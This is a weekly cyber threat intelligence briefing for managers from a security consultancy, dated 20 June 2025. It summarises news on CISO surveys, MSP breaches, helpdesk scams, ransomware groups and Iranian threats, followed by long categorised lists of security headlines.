The real threat to the UK from Iran - from sleeper cells to cyber attacks
Israel expands cyber powers amid rising threats—via WhatsApp | Ctech
Tools and Controls
Most AI and SaaS apps are outside IT's control - Help Net Security
Are we making hackers sound too cool? These security experts think so | TechRadar
The Hidden Risks of SaaS: Why Built-In Protections Aren't Enough for Modern Data Resilience
When the Cloud Goes Down, Will Your Security Go With It? | Symantec Enterprise Blogs
And Now Malware That Tells AI to Ignore It?
AI Agents Are Getting Better at Writing Code—and Hacking It as Well | WIRED
Half of Security Pros Want GenAI Deployment Pause - Infosecurity Magazine
Microsoft rolls out Windows security changes to prevent another CrowdStrike meltdown | ZDNET
Don’t be distracted by AI – fundamental cyber skills are still key | TechRadar
Bring Your Own Installer EDR Bypass Observed in Ransomware Operation | MSSP Alert
What is Risk Avoidance? | Definition from TechTarget
How CISOs can justify security investments in financial terms - Help Net Security
How Executives Could Respond When Faced With Multiple Crisis Situations
Other News
BT says nearly half small businesses have suffered a cyber attack in the last year
Microsoft rolls out Windows security changes to prevent another CrowdStrike meltdown | ZDNET
Services disrupted as cyber attack hits Glasgow Council - UKTN
Cyber attacks on insurers put CFOs on high alert | Fortune
EU and Australia commit to Defence Partnership| Cybernews
Building cyber resilience in the financial sector
Decade of risk: signaling security in an era of geopolitical tension - DCD
Medical device cyber attacks push hospitals into crisis mode - Help Net Security
Cyber Intel Pros and Hobbyists Can Now Report Threats Anonymously - Infosecurity Magazine
French city of Lyon ditching Microsoft for FOSS • The Register
Security pro counts the cost of Microsoft dependency • The Register
Some European Countries Are Ditching Microsoft Software For Good (And Here's Why That Matters)
Denmark is switching to Linux | PC Gamer
Dual-Use Military and Civil Airports Face Cyber Threats
The Security Fallout of Cyber Attacks on Government Agencies - Security Boulevard
Cyber Skills Today for Economic Growth Tomorrow
Vulnerability Management
'7% of organisations tackle vulnerabilities only when necessary' - Data Centre & Network News
CISA Is Shrinking: What Does It Mean for Cyber?
Irish businesses show gaps in cyber security as 6 in 10 overlook regular software updates
Vulnerabilities
Critical Citrix NetScaler bug fixed, upgrade ASAP! (CVE-2025-5777) - Help Net Security
Up next on the KEV? All signs point to 'CitrixBleed 2' • The Register
Critical RCE Flaws in Cisco ISE and ISE-PIC Allow Unauthenticated Attackers to Gain Root Access
Linux flaws chain allows Root access across major distributions
Threat Actor Allegedly Selling FortiGate API Exploit Tool Targeting FortiOS
Hundreds of MCP Servers at Risk of RCE and Data Leaks - Infosecurity Magazine
Asana Fixes Security Flaw in AI Data Integration Tool
Chrome 138, Firefox 140 Patch Multiple Vulnerabilities - SecurityWeek
Millions of Brother Printers Hit by Critical Unpatchable Bug
CISA Adds 3 Flaws to KEV Catalog, Impacting AMI MegaRAC, D-Link, Fortinet
Critical Open VSX Registry Flaw Exposes Millions of Developers to Supply Chain Attacks
WinRAR patches bug letting malware launch from extracted archives
Critical Teleport Vulnerability Let Attackers Remotely Bypass Authentication Controls
Flaw in Notepad++ installer could grant attackers SYSTEM access (CVE-2025-49144) - Help Net Security
Motors Theme Vulnerability Exploited to Hack WordPress Websites - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 20 June 2025
Black Arrow Cyber Threat Intelligence Briefing 20 June 2025:
-Survey Reveals 98% of CISOs Anticipate Increased Cyber Attacks Within Three Years
-Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals
-IT Helpdesk Scams are Ramping Up – Here’s What Leaders Can Do
-Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
-Why CISOs Must Align Business Objectives and Cyber Security
-Scattered Spider has Moved from Retail to Financial Services, Insurance Now Targeted
-Ransomware Thrives in Shook-Up Criminal Underworld
-Russian Gang’s Cyber Attack on UK Blood Services ‘Harmed 170 Patients’
-Experts Warn Clicking "Unsubscribe" Could Actually be a Security Risk, Here's Why
-Security Is Only as Strong as the Weakest Third-Party Link
-Employees Are Using AI Where They Know They Shouldn’t
-Threat of Cyber Attacks from Iran Concern Security Experts
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review of cyber security in specialist and general media this week features a survey of 300 CISOs where 98% expect increased cyber threats within three years, with growing concern over third-party risks and hybrid outsourcing models. A separate survey revealed that 69% of managed service providers (MSPs) reported multiple cyber breaches in the last 12 months, highlighting supply chain risks to be managed by organisations including the popular attack tactic of IT Helpdesk scams. We also report on the evolution of phishing using agentic-AI and deepfake, and the use of ‘unsubscribe’ buttons on phishing emails to compromise the recipient’s systems.
The structure and tactics of the criminal ecosystem continues to evolve. New attacker groups are emerging as others disappear and existing groups are moving from the retail sector to target financial services, while Iranian cyber attackers are coming to the fore. We also report on the need for CISOs to demonstrate board-level alignment of security and business growth, and the need for stronger governance over the use of AI in organisations.
At Black Arrow Cyber Consulting, we strongly believe these developing risks are best addressed through an organisational-wide approach to security. In line with globally respected frameworks, this starts with governance by a leadership team that has a strong understanding of the fundamentals of cyber security using controls across people, operations and technology to address the evolving risks including social engineering, third party risks, and AI.
Top Cyber Stories of the Last Week
Survey Reveals 98% of CISOs Anticipate Increased Cyber Attacks Within Three Years
CSC’s latest global survey of 300 CISOs found that 70% believe security threats will increase in the next year and almost all (98%) predict an increase in the next three years. The study also highlights a rise in cyber security budgets and growing reliance on hybrid outsourcing models, though concerns remain over third-party access and poor compliance by domain providers.
https://www.techmonitor.ai/technology/cybersecurity/csc-survey-cisos-anticipate-cyberattacks
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals
CyberSmart’s latest survey reveals that managed service providers (MSPs) remain a key target for cybercriminals, citing recent examples of organisations being attacked through their MSP. 69% of MSP participants reported multiple breaches in the last 12 months, with almost half facing three or more. 39% felt prepared to offer a solution or guidance to customers in meeting their cybersecurity regulations which could include DORA or NIS2. The report notes opportunities to further strengthen cyber resilience. MSPs named continuous monitoring, employee cybersecurity training, and proactive risk management as the measures most likely to help them improve cyber confidence. https://www.itsecurityguru.org/2025/06/19/over-two-thirds-of-msps-hit-by-multiple-breaches-in-past-year-survey-reveals/
IT Helpdesk Scams are Ramping Up – Here’s What Leaders Can Do
IT helpdesk scams are becoming more sophisticated, targeting staff across legal, financial and other high-value sectors. Attackers often pose as internal IT support to trick users into installing legitimate remote access tools, giving criminals control of systems. Recent breaches at retailers M&S and the Co-op highlight how even trained IT staff can be manipulated. Criminal groups and state actors alike are adopting these tactics, increasingly enhanced by artificial intelligence to personalise interactions and build trust. With technical controls often bypassed, firms must invest in regular user training, restrict admin rights, and block unauthorised remote access tools to reduce risk.
https://www.itpro.com/security/cyber-attacks/it-helpdesk-scams-are-ramping-up-heres-what-to-do
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
Phishing is entering a new phase, with AI-driven threats set to challenge traditional defences. Known as Phishing 3.0, this wave combines highly convincing deepfakes and autonomous AI agents capable of executing entire campaigns without human input. These tools can convincingly mimic voices or faces of trusted individuals, increasing the risk of fraud and data loss. A recent study found that current defences miss over two-thirds of phishing emails. To remain resilient, organisations must invest in advanced AI-powered detection and raise staff awareness to spot fake communications that appear authentic and urgent. The threat is growing rapidly, and preparation is essential.
Why CISOs Must Align Business Objectives and Cyber Security
A successful chief information security officer (CISO) must align cyber security with business objectives to support growth, innovation and resilience. As cyber threats grow more complex, including silent long-term intrusions and AI-driven attacks, CISOs must take a proactive approach that secures operations without hindering them. This requires board-level engagement, clarity over roles and responsibilities, and regular communication with other executives. Shared ownership of cyber risk across leadership teams fosters a culture where business and security priorities work in tandem. Simulations, modern tools, and well-structured processes further help ensure the organisation is prepared before a major incident occurs.
Scattered Spider has Moved from Retail to Financial Services, Insurance Now Targeted
The cyber crime group known as Scattered Spider has shifted its focus from retailers to the insurance sector, prompting warnings from Google for firms to be on high alert. Several US insurers, including Erie and Philadelphia Insurance, have reported system outages linked to unauthorised access, with investigations still ongoing. The group is known for using fake helpdesk calls to gain access before deploying ransomware. Google recommends enhanced caller verification, stronger authentication methods, and helpdesk training to reduce the risk. The prolonged disruption highlights the need for robust cyber security defences across the financial and insurance sectors.
https://www.theregister.com/2025/06/16/scattered_spider_targets_insurance_firms/
Ransomware Thrives in Shook-Up Criminal Underworld
The ransomware threat landscape is evolving rapidly, with a wave of new groups emerging as older operations disappear. A recent surge in attacks linked to groups such as SafePay, Qlin, Play and Akira accounted for 64 victims in May alone, with organisations in the UK, US, and Europe among those affected. The collapse of major players like RansomHub has triggered fierce competition among criminal groups, leading to greater fragmentation and more sophisticated tactics. Some attacks now appear to serve dual purposes, including espionage. Meanwhile, code reuse from defunct groups like REvil shows that while names may change, the threat remains constant.
https://www.govinfosecurity.com/ransomware-thrives-in-shook-up-criminal-underworld-a-28739
Russian Gang’s Cyber Attack on UK Blood Services ‘Harmed 170 Patients’
A ransomware cyber attack carried out by a Russian criminal group last year severely disrupted pathology services at London hospitals and GP surgeries, directly impacting patient care. The incident, which targeted the provider Synnovis, led to the cancellation of over 10,000 medical appointments and halted blood testing across many GP practices. Reports now confirm that nearly 600 incidents were linked to the disruption, with 170 patients suffering direct harm. These included one case of severe harm and 14 of moderate harm. The attack highlights the real-world consequences of digital vulnerabilities in critical healthcare systems.
https://www.lbc.co.uk/tech/russian-gangs-cyber-attack-on-blood-services-harmed-170-patients/
Experts Warn Clicking "Unsubscribe" Could Actually be a Security Risk, Here's Why
Clicking “unsubscribe” in spam emails may expose users to cyber attacks, experts warn. Threat actors often use these buttons to redirect recipients to harmful websites or confirm active email addresses for future targeting. Research suggests around 1 in 600 clicks lead to malicious content. If the sender is unfamiliar or untrusted, using the unsubscribe option is not advised. Instead, users should rely on built-in unsubscribe features within their email client, use spam filters, or create disposable email addresses to minimise risk. This highlights the need for caution when managing unwanted emails, even in seemingly routine actions.
Security Is Only as Strong as the Weakest Third-Party Link
Third-party risks are now a major contributor to data breaches, accounting for 30% of incidents. High-profile incidents have shown how supplier vulnerabilities can disrupt operations at scale. To remain resilient, security leaders must shift to continuous monitoring and treat third-party risks as their own. With rising complexity and resource constraints, technology and smarter assessments are vital to protecting businesses in an increasingly interconnected environment.
https://www.darkreading.com/vulnerabilities-threats/security-strong-weakest-third-party-link
Employees Are Using AI Where They Know They Shouldn’t
Many employees are using artificial intelligence tools in ways they know they shouldn’t, including for sensitive tasks such as safety decisions and personnel matters. Despite this, 86% of staff lack confidence in AI’s accuracy, and most feel undertrained in its practical use. Smaller firms in particular struggle with adoption, with nearly half of employees unsure how to use AI effectively. Business leaders should take urgent steps to improve staff training, introduce clear and enforceable AI policies, and avoid deploying tools without defined purpose or oversight, as failure to do so risks both misuse and missed productivity gains.
https://www.helpnetsecurity.com/2025/06/18/employees-ai-potential/
Threat of Cyber Attacks from Iran Concern Security Experts
Cyber security experts are warning of a heightened threat of cyber attacks linked to Iran, particularly in light of ongoing regional tensions. Sectors such as energy, finance and transport are viewed as high-risk due to their potential for widespread disruption. Experts have noted the use of advanced phishing techniques and malware targeting critical systems, including those controlling fuel supplies and public infrastructure. Activity from both state-sponsored and sympathetic groups has increased, with dormant hacking groups resurfacing and issuing threats. Businesses are advised to strengthen defences and report suspicious activity, especially where remote access or unpatched systems are involved.
https://www.washingtontimes.com/news/2025/jun/18/cyber-pros-warn-digital-threats-spreading-iran/
Governance, Risk and Compliance
Survey reveals 98% of CISOs anticipate increased cyber attacks within three years – Tech Monitor
Why CISOs Must Align Business Objectives & Cyber Security
Cyber Security Strategy Shifts Amid Global Political Tensions
How to Break the Security Theater Illusion
Bridging the Gap Between CEOs and CISOs for AI Adoption | MSSP Alert
What is a compliance audit? (with an example checklist) | TechTarget
Security Is Only as Strong as the Weakest Third-Party Link
Security Evolution: From Pothole Repair to Road Building
Choosing a Clear Direction in the Face of Growing Cyber Security Demands - SecurityWeek
7 trends shaping digital transformation in 2025 - and AI looms large | ZDNET
How C-suite roles are shaping the future of tech leadership - Help Net Security
15 Emerging Cyber Security Threats and How to Prepare - DevX
Changing nature of cyber threat leads to ‘brittle’ risk landscape - Insurance Post
Threats
Ransomware, Extortion and Destructive Attacks
Scattered Spider Using Aggressive Social Engineering Techniques to Deceive IT Support Teams
IT helpdesk scams are ramping up –here’s what leaders can do | IT Pro
Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion
Scattered Spider targets insurance firms, Google warns • The Register
Hackers switch to targeting US insurance companies
Ransomware Thrives in Shook-Up Criminal Underworld
Qilin Ransomware Emerges as World's Top Threat, Demands $50 Million Ransom
Fog ransomware attacks use employee monitoring tool to break into business networks | TechRadar
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
Anubis ransomware adds wiper to destroy files beyond recovery
Ransomware Group Qilin Offers Legal Counsel to Affiliates - Infosecurity Magazine
Ransomware gang busted in Thailand hotel raid
Don’t Get Caught in Scattered Spider’s Web | McCarter & English, LLP - JDSupra
Ransomware 3.0: A Glimpse Into the Post-Trust Ecosystem
Bert Ransomware: What You Need To Know | Fortra
Cyber attack purportedly compromises Scania’s corporate insurance subsidiary | SC Media
Ryuk ransomware’s initial access expert extradited to the US
Ransomware Victims
Russian gang’s cyber attack on blood services ‘harmed 170 patients’ - LBC
Victoria’s Secret restores critical systems after cyber attack
Freedman HealthCare targeted by cyber extortionists • The Register
Cyber attack pushes German napkin company into insolvency – DataBreaches.Net
2 Insurers Say Ongoing Outages Are Not Caused by Ransomware
Phishing & Email Based Attacks
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
ChainLink Phishing: How Trusted Domains Become Threat Vectors
Why You Should Think Twice Before You Click ‘Unsubscribe’ in an Email - WSJ
Researcher shows how Android notifications can be a phisher's gold mine
Phishing goes prime time: Hackers use trusted sites to hijack search rankings | CSO Online
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
MailerLite warns of phishing campaign • Graham Cluley
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Washington Post email breach under probe | Cybernews
Other Social Engineering
SCATTERED SPIDER Using Aggressive Social Engineering Techniques to Deceive IT Support Teams
IT helpdesk scams are ramping up –here’s what leaders can do | IT Pro
North Korean hackers deepfake execs in Zoom call to spread Mac malware
Researcher shows how Android notifications can be a phisher's gold mine
Virtual kidnapping scams prey on our worst fears - Help Net Security
Why Are Cyber Criminals Targeting Law Firms With Voice Phishing? | Law.com
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack - SecurityWeek
Fraud, Scams and Financial Crime
Brits Lose £106m to Romance Fraud in a Year - Infosecurity Magazine
Why You Should Think Twice Before You Click ‘Unsubscribe’ in an Email - WSJ
US recovers $225 million of crypto stolen in investment scams
Scammers hijack real support pages to show fake phone numbers | TechSpot
Paddle settles for $5 million over facilitating tech support scams
Krispy Kreme Data Breach Puts Employees at Risk of Financial Fraud - Infosecurity Magazine
Artificial Intelligence
North Korean hackers deepfake execs in Zoom call to spread Mac malware
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
Employees are using AI where they know they shouldn’t - Help Net Security
Bridging the Gap Between CEOs and CISOs for AI Adoption | MSSP Alert
China’s Spy Agencies Are Investing Heavily in AI, Researchers Say - The New York Times
NCSC sounds warning over AI threat to critical national infrastructure | UKAuthority
As Geopolitical Tensions Rise AI Is Amplifying the Threat of Global Cyberwarfare
Who's guarding the AI? Even security teams are bypassing oversight - Help Net Security
M365 Copilot: New Zero-Click AI Flaw Allows Corporate Data Theft - Infosecurity Magazine
Why CISOs need to understand the AI tech stack - Help Net Security
CISOs flag gaps in GenAI strategy, skills, and infrastructure - Help Net Security
7 trends shaping digital transformation in 2025 - and AI looms large | ZDNET
Before scaling GenAI, map your LLM usage and risk zones - Help Net Security
LLM agents flunk CRM and confidentiality tasks • The Register
Stop Anthropomorphizing AI and Secure It Like Software
How CISOs Can Govern AI & Meet Evolving Regulations
Mitigating AI Threats: Bridging the Gap Between AI and Legacy Security - SecurityWeek
Researchers Warn of AI Attacks After PoC Exploits Atlassian's AI Agent - Infosecurity Magazine
Malware attack disguises itself as DeepSeek installer • Graham Cluley
2FA/MFA
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
Why SMS two-factor authentication codes aren't safe and what to use instead | ZDNET
Malware
North Korean hackers deepfake execs in Zoom call to spread Mac malware
Malware attack disguises itself as DeepSeek installer • Graham Cluley
New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack - SecurityWeek
Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month
Threat Actors Target Victims with HijackLoader and DeerStealer - Infosecurity Magazine
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Google Chrome Zero-Day CVE-2025-2783 Exploited by TaxOff to Deploy Trinper Backdoor
Threat Actors Attacking Windows System With New Winos 4.0 Malware
Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register
Banana Squad’s Stealthy GitHub Malware Campaign Targets Devs - Infosecurity Magazine
New Campaigns Distribute Malware via Open Source Hacking Tools - SecurityWeek
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
Malicious Chimera Turns Larcenous on Python Index
Security Bite: Infostealer malware spikes 28% among Mac users, says Jamf - 9to5Mac
'Water Curse' Targets Infosec Pros via Poisoned GitHub Repos
Bots/Botnets
Hackers Exploit Langflow Flaw to Unleash Flodrix Botnet
Mobile
Researcher shows how Android notifications can be a phisher's gold mine
Godfather Android malware now uses virtualization to hijack banking apps
New Android Malware Surge Hits Devices via Overlays, Virtualization Fraud and NFC Theft
Denial of Service/DoS/DDoS
Protecting Against Origin Server DDoS Attacks - Security Boulevard
Internet of Things – IoT
Thieves don't need your car keys, just a wireless signal - Help Net Security
SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles - Help Net Security
Data Breaches/Leaks
The 20 biggest data breaches of the 21st century | CSO Online
UBS Employee Data Reportedly Exposed in Third Party Attack - Infosecurity Magazine
GCHQ intern who took secret data home jailed - BBC News
FCA warned four staffers who pocketed regulator data • The Register
UK fines 23andMe for ‘profoundly damaging’ breach exposing genetics data
Cartier Data Breach: Luxury Retailer Warns Customers That Personal Data Was Exposed - SecurityWeek
Telecom giant Viasat breached by China's Salt Typhoon hackers
No, the 16 billion credentials leak is not a new data breach
Hackers Access Legacy Systems in Oxford City Council Cyber Attack - SecurityWeek
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals - IT Security Guru
MSPs remain confident over security | Microscope
Freedman HealthCare targeted by cyber extortionists • The Register
CCC breach exposes 9M Americans, hackers claim | Cybernews
Krispy Kreme Data Breach Puts Employees at Risk of Financial Fraud - Infosecurity Magazine
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Paraguay Suffered Data Breach: 7.4 Million Citizen Records Leaked on Dark Web
Zoomcar discloses security breach impacting 8.4 million users
240,000 Impacted by Data Breach at Eyecare Tech Firm Ocuco - SecurityWeek
Data Breach at Healthcare Services Firm Episource Impacts 5.4 Million People - SecurityWeek
Hacker steals 1 million Cock.li user records in webmail data breach
Ex-CIA Analyst Sentenced to 37 Months for Leaking Top Secret National Defence Documents
Organised Crime & Criminal Actors
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Dutch police identify users as young as 11-year-old on Cracked.io hacking forum
Dutch police identify 126 Cracked.io users | Cybernews
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Pro-Israel hackers hit Iran's Nobitex exchange, burn $90M in crypto
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
Insurance
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
Changing nature of cyber threat leads to ‘brittle’ risk landscape - Insurance Post
Supply Chain and Third Parties
UBS Employee Data Reportedly Exposed in Third Party Attack - Infosecurity Magazine
ChainLink Phishing: How Trusted Domains Become Threat Vectors
Security Is Only as Strong as the Weakest Third-Party Link
'Water Curse' Targets Infosec Pros via Poisoned GitHub Repos
Cloud/SaaS
M365 Copilot: New Zero-Click AI Flaw Allows Corporate Data Theft - Infosecurity Magazine
Threat Actor Abuses TeamFiltration for Entra ID Attacks
Google links massive cloud outage to API management issue
Why Denmark is dumping Microsoft Office and Windows for LibreOffice and Linux | ZDNET
German state ditches Microsoft for open-source software - NZ Herald
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register
Outages
Google links massive cloud outage to API management issue
2 Insurers Say Ongoing Outages Are Not Caused by Ransomware
Encryption
Encryption Backdoors: The Security Practitioners’ View - SecurityWeek
Linux and Open Source
Why Denmark is dumping Microsoft Office and Windows for LibreOffice and Linux | ZDNET
German state ditches Microsoft for open-source software - NZ Herald
CISA Warns of Active Exploitation of Linux Kernel Privilege Escalation Vulnerability
New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions
Passwords, Credential Stuffing & Brute Force Attacks
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials
Social Media
Ofcom investigates 4chan for not protecting users from illegal content • Graham Cluley
Trump administration set to again waive TikTok ban • The Register
Meta Starts Showing Ads on WhatsApp After 6-Year Delay From 2018 Announcement
Regulations, Fines and Legislation
Ofcom investigates 4chan for not protecting users from illegal content • Graham Cluley
How CISOs Can Govern AI & Meet Evolving Regulations
Cyber security takes a big hit in new Trump executive order - Ars Technica
Trump administration set to again waive TikTok ban • The Register
SEC withdraws cyber rules for investment companies, advisers | CyberScoop
The Future of the SEC’s Cyber Security Disclosure Rules | DLA Piper - JDSupra
Careers, Working in Cyber and Information Security
Employers are demanding too much from junior cyber recruits • The Register
AI is changing cyber security roles, and entry-level jobs are at risk - Help Net Security
ISC2 Report: Entry-Level Hiring Needs a Reset
The Triple Threat of Burnout: Overworked, Unsatisfied, Trapped
Building a Career as a Cyber Warfare Defender - DataBreachToday
Cyber Security Company Launches In-House 'University' Training Program
Law Enforcement Action and Take Downs
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Dutch police identify 126 Cracked.io users | Cybernews
GCHQ intern who took secret data home jailed - BBC News
Ransomware gang busted in Thailand hotel raid
Ryuk ransomware’s initial access expert extradited to the US
Law enforcement operation shut down dark web drug marketplace Archetyp Market
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
As Geopolitical Tensions Rise AI Is Amplifying the Threat of Global Cyber Warfare
Israeli Strikes Raise Fears of Cyber Attacks and Retaliation
Israel strikes Iran: A history of assassinations, sabotages, cyber attacks
Cyber weapons in the Israel-Iran conflict may hit the US • The Register
Cyber attacks against Israel increase since start of Iran conflict | The Jerusalem Post
Threats to the 2025 NATO Summit: Cyber, Influence, and Hybrid Risks
Protecting Civilians in Cyber Space: A UN Security Council Imperative • Stimson Center
Nation State Actors
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
China
China’s Spy Agencies Are Investing Heavily in AI, Researchers Say - The New York Times
How China Is Using Hackathons, Competitions to Build an Army of Hackers - Bloomberg
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
China Is Hacking Russia to Steal War Secrets - The New York Times
Telecom giant Viasat breached by China's Salt Typhoon hackers
State-sponsored hackers compromised the email accounts of several Washington Post journalists
Russia
Russia has a plan for long-term aggression against Europe - Kallas | УНН
Russian gang’s cyber attack on blood services ‘harmed 170 patients’ - LBC
China Is Hacking Russia to Steal War Secrets - The New York Times
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
Suspected Russian hackers used new tactic against UK researcher | Reuters
Sweden says it is under cyber attack • Graham Cluley
Iran
Israeli Strikes Raise Fears of Cyber Attacks and Retaliation
Israel strikes Iran: A history of assassinations, sabotages, cyber attacks
Cyber Attacks against Israel increase since start of Iran conflict | The Jerusalem Post
Pro-Israel hackers hit Iran's Nobitex exchange, burn $90M in crypto
Companies Warned On Iranian Cyber Attacks - WSJ
Israel-Tied Predatory Sparrow Hackers Are Waging Cyber War on Iran’s Financial System | WIRED
Iran-Israel War Triggers a Maelstrom in Cyber Space
Iran’s internet goes offline amid claims of ‘enemy abuse’ • The Register
Iran's Cyber Army: Missing in Action
Pro-Israel hackers take credit for cyber attack on Iran's Bank Sepah
Cyber attack hits state-owned bank in Iran - Iraqi News
Iran experienced a near-total national internet blackout
Elon Musk turns on Starlink in Iran as Tehran shuts down internet | The Jerusalem Post
North Korea
North Korean hackers deepfake execs in Zoom call to spread Mac malware
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Protecting Civilians in Cyber Space: A UN Security Council Imperative • Stimson Center
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials
Tools and Controls
Security Is Only as Strong as the Weakest Third-Party Link
Who's guarding the AI? Even security teams are bypassing oversight - Help Net Security
Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion
Choosing a Clear Direction in the Face of Growing Cyber Security Demands - SecurityWeek
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
CISOs flag gaps in GenAI strategy, skills, and infrastructure - Help Net Security
Fog ransomware attacks use employee monitoring tool to break into business networks | TechRadar
AI is changing cyber security roles, and entry-level jobs are at risk - Help Net Security
Cyber Security Strategy Shifts Amid Global Political Tensions
What is a compliance audit? (with an example checklist) | TechTarget
CISOs brace for a surge in domain-based cyber threats - Help Net Security
SAML vs. OAuth 2.0: Mastering the Key Differences - Security Boulevard
Microsoft Quietly Disabled Windows Hello Facial Recognition in the Dark
Why a Layered Approach Is Essential for Cyber Security and Zero Trust - Security Boulevard
Mitigating AI Threats: Bridging the Gap Between AI and Legacy Security - SecurityWeek
Application security risk: How leaders can protect their businesses | IT Pro
Stop Anthropomorphizing AI and Secure It Like Software
The new attack surface: from space to smartphone - SpaceNews
Other News
‘We’re being attacked all the time’: how UK banks stop hackers | Banking | The Guardian
Why Legal Firms Are Vulnerable to Cyber Threats and How to Prevent the Risks | LawNews.co.uk
Threats to the 2025 NATO Summit: Cyber, Influence, and Hybrid Risks
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals - IT Security Guru
MSPs remain confident over security | Microscope
Bank of England loses hundreds of laptops amid rising cyber threat
WestJet: 'expect interruptions' online amid security snafu • The Register
This Is One of the Worst Things You Can Do at the Airport, According to Cyber Security Experts
Why Are Cyber Criminals Targeting Law Firms With Voice Phishing? | Law.com
Cyber Attacks on Humanitarian Orgs Jump Worldwide
Survey of UK retailers shows lack of preparedness for cyber attacks | Logistics Matters
Vulnerability Management
Vulnerabilities
Veeam Patches CVE-2025-23121: Critical RCE Bug Rated 9.9 CVSS in Backup & Replication
Code Execution Vulnerabilities Patched in Veeam, BeyondTrust Products - SecurityWeek
Critical Vulnerability Patched in Citrix NetScaler - SecurityWeek
High-Severity Vulnerabilities Patched by Cisco, Atlassian - SecurityWeek
New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions
Google Chrome Zero-Day CVE-2025-2783 Exploited by TaxOff to Deploy Trinper Backdoor
Critical Vulnerability Exposes Many Mitel MiCollab Instances to Remote Hacking - SecurityWeek
Apple squashes zero-click bug used for spyware attacks • The Register
Palo Alto Networks fixed multiple privilege escalation flaws
Code Execution Vulnerabilities Patched in Veeam, BeyondTrust Products - SecurityWeek
BeyondTrust warns of pre-auth RCE in Remote Support software
Microsoft Quietly Disabled Windows Hello Facial Recognition in the Dark
AMD releases security update for Ryzen CPUs with TPM vulnerability - Techzine Global
Over 46,000 Grafana instances exposed to account takeover bug
Microsoft: June Windows Server security updates cause DHCP issues
ASUS Armoury Crate bug lets attackers get Windows admin privileges
Attackers actively exploit older TP-Link routers | Cybernews
Organisations Warned of Vulnerability Exploited Against Discontinued TP-Link Routers - SecurityWeek
Zyxel Firewall Vulnerability Again in Attacker Crosshairs - SecurityWeek
Hackers Exploit Langflow Flaw to Unleash Flodrix Botnet
SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles - Help Net Security
Researchers Warn of AI Attacks After PoC Exploits Atlassian's AI Agent - Infosecurity Magazine
Sector Specific
Industry specific threat intelligence reports are available.
